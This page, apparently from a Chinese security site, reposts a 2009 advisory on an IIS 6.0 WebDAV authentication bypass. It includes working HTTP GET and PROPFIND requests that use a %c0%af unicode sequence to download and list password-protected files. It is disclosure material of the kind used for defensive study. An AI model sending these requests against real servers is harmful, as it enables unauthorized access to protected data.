首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability
来源:kcope2@googlemail.com 作者:Kcope 发布时间:2009-05-18  

                                              ####                   
                #                            #####                   
               ####            #             #####                   
              #######         ###           ######                   
                #######      ######       #######                    
                 #########   #######     ########                    
                 #####################  #########                    
                  #### #########  ########## ####                    
                  ####   ######    #######   ####                    
                  ####     ####      ####    ####                    
                   ####                #    #####                    
                   ########    ######       ######                   
                   ###############################                   
    # ####          ##############################                   
    #######      ##             #      ##                            
     ######     #####      ### ##      ####                          
      #####    #####       ########    ####      #######       ##    
      #####    ####     #  #########   ####     #################    
      ####    #####   ####  ########   ####    ##################    
    #######  #####    ####  #########  ####   #####         #####    
   #################  ####  #### ####  ####  #####    #####          
      ##############  ####  #### ##### ##########     #############  
      ####      #####  #### ####  #### ##########     ############   
      ####       ##### #########  #### ####  #####            ####   
      ####        ######### ####   ########   ####            ####   
      #####        #############   ########   #####     ###########  
      #####         ####### ####    #######    ####################  
      ##### #####   ##              #######     ############ #####   
      ####  ###########           #     ##       ######         #    
            ##############   ##  ##############    #############     
           #####    ###### ##### ################# #############     
          #####            ######     ############   ####            
        ######         # #########    ####    ####  ####             
       #####         ########  ####  #####    ####  ###########      
      #####          ######     ##################  ###########      
     #####            #####      ################# ############      
     #######       #########    ###########  ####  ####              
        ############### #############  ####      ########            
          #############  ##########    ####     ################     
            ####          ######       ###       ###############     
                           #                                 ### 

archive: http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

   *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE ***

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope - May 12th, 2009


Affected Vendors

      Microsoft

Affected Products

      Web Server

Vulnerability Details

This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:

         Authentication bypass of password protected folders
         Listing, downloading and uploading of files into a password protected WebDAV folder

Authentication bypass of password protected folders

Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“

The attacker sends a HTTP GET request to the web server.

         GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using
WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:

         GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.

Listing files in a password protected WebDAV folder

The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.

        PROPFIND /protec%c0%afted/ HTTP/1.1
        Host: servername
        User-Agent: neo/0.12.2
        Connection: TE
        TE: trailers
        Depth: 1
        Content-Length: 288
        Content-Type: application/xml
        <?xml version="1.0" encoding="utf-8"?>
        <propfind xmlns="DAV:"><prop>
        <getcontentlength xmlns="DAV:"/>
        <getlastmodified xmlns="DAV:"/>
        <executable xmlns="http://apache.org/dav/props/"/>
        <resourcetype xmlns="DAV:"/>
        <checked-in xmlns="DAV:"/>
        <checked-out xmlns="DAV:"/>
        </prop></propfind>

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
        Nikolaos Rangos
        Contact: kcope2@googlemail.com
        Greetings to: alex and andi


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·freebsd/x86-64 execve /bin/sh
·PHPenpals <= 1.1 (mail.php ID)
·Audioactive Player 1.93b (.m3u
·Basic differences between x86
·Harland Scripts 11 Products Re
·linux/x86-64 bindshell(port 44
·Audioactive Player 1.93b (.m3u
·Jieqi CMS versions 1.5 and bel
·httpdx <= 0.5b FTP Server (USE
·linux/x86-64 setuid(0) + execv
·ClanWeb 1.4.2 Remote Change Pa
·2daybiz Template Monster Clone
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved